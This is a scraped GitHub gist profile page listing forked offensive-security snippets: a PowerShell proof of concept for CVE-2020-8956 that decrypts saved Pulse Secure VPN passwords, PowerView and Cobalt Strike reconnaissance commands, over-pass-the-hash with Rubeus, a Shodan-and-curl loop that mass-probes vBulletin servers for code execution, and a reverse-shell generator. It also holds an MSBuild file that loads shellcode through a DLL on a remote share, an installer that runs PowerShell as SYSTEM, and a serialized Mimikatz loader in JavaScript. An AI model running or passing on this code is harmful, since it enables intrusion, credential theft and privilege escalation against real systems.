Skip to content

Instantly share code, notes, and snippets.

View unbaiat's full-sized avatar

unbaiat unbaiat

  • Unicorns United Ltd
  • Castalia
View GitHub Profile
@unbaiat
unbaiat / CVE-2020-8956.ps1
Created October 29, 2020 07:53 — forked from qkaiser/CVE-2020-8956.ps1
CVE-2020-8956 - Powershell PoC
Add-Type -AssemblyName System.Security;
$ives = Get-ItemProperty -Path 'Registry::HKEY_USERS\*\Software\Pulse Secure\Pulse\User Data\*'
foreach($ive in $ives) {
$ivename = $ive.PSPath.split('\')[-1].ToUpper()
Write-Host "[+] Checking IVE $($ivename)..."
$seed = [System.Text.Encoding]::GetEncoding('UTF-16').getBytes($ivename)
# 3 possible value names for password
$encrypted = $ive.Password1
if(!$encrypted){
@unbaiat
unbaiat / PowerView-3.0-tricks.ps1
Created October 15, 2020 18:41 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@unbaiat
unbaiat / cobaltstrike_sa.txt
Created October 15, 2020 18:41 — forked from HarmJ0y/cobaltstrike_sa.txt
Cobalt Strike Situational Awareness Commands
Windows version:
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Users who have authed to the system:
ls C:\Users\
System env variables:
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
Saved outbound RDP connections:
@unbaiat
unbaiat / gist:512f813eafda92406ae753890be43482
Created October 15, 2020 18:40 — forked from HarmJ0y/gist:dc379107cfb4aa7ef5c3ecbac0133a02
Over-pass-the-hash with Rubeus and Beacon
##### IF ELEVATED:
# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH
# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter
shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done;
#!/bin/bash
# This is not great...
#
NAME=Shell
TAC=TrustAllCertificates
LHOST=10.0.0.254
LPORT=4444
COMMAND='"powershell"'
CURDIR=$(pwd)
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="MyTarget">
<SimpleTask MyProperty="My voice is my passport."
MyCode='<base64 encoded x64 shellcode>'
MyProcess='C:\Program Files\Internet Explorer\iexplore.exe'/>
</Target>
<UsingTask TaskName="SimpleTask" AssemblyFile="\\192.168.120.129\share\IEShims.dll" />
</Project>
@unbaiat
unbaiat / msigen.wix
Created January 4, 2020 16:17 — forked from xpn/msigen.wix
WIX file with embedded Powershell, which will be executed as SYSTEM
<?xml version="1.0"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
<Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name" Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
<Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
<Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>
<Directory Id="TARGETDIR" Name="SourceDir">
<Directory Id="ProgramFilesFolder">
<Directory Id="INSTALLLOCATION" Name="Example">
<Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
@unbaiat
unbaiat / tasks.cs
Created January 4, 2020 16:16 — forked from xpn/tasks.cs
Create a .NET Type Dynamically at Runtime, Execute in Script. Prototype DynamicWrapperX , but not posting that publicly
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
using System.Reflection;
using System.Reflection.Emit;
using System.Collections;
using System.Collections.Generic;
@unbaiat
unbaiat / tz.js
Last active December 10, 2019 10:20 — forked from hardw00t/mimikatz.js
Mimikatz.exe in JS
This file has been truncated, but you can view the full file.
var serialized_obj2 = [
0,1,0,0,0,255,255,255,255,1,0,0,0,0,0,0,0,4,1,0,0,0,34,83,121,115,116,101,109,46,68,101,108,
101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,3,0,0,0,8,68,101,108,
101,103,97,116,101,7,116,97,114,103,101,116,48,7,109,101,116,104,111,100,48,3,3,3,48,83,121,115,116,101,109,46,
68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101,
103,97,116,101,69,110,116,114,121,34,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,
122,97,116,105,111,110,72,111,108,100,101,114,47,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,77,
101,109,98,101,114,73,110,102,111,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,9,2,0,0,
0,9,3,0,0,0,9,4,0,0,0,4,2,0,0,0,48,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,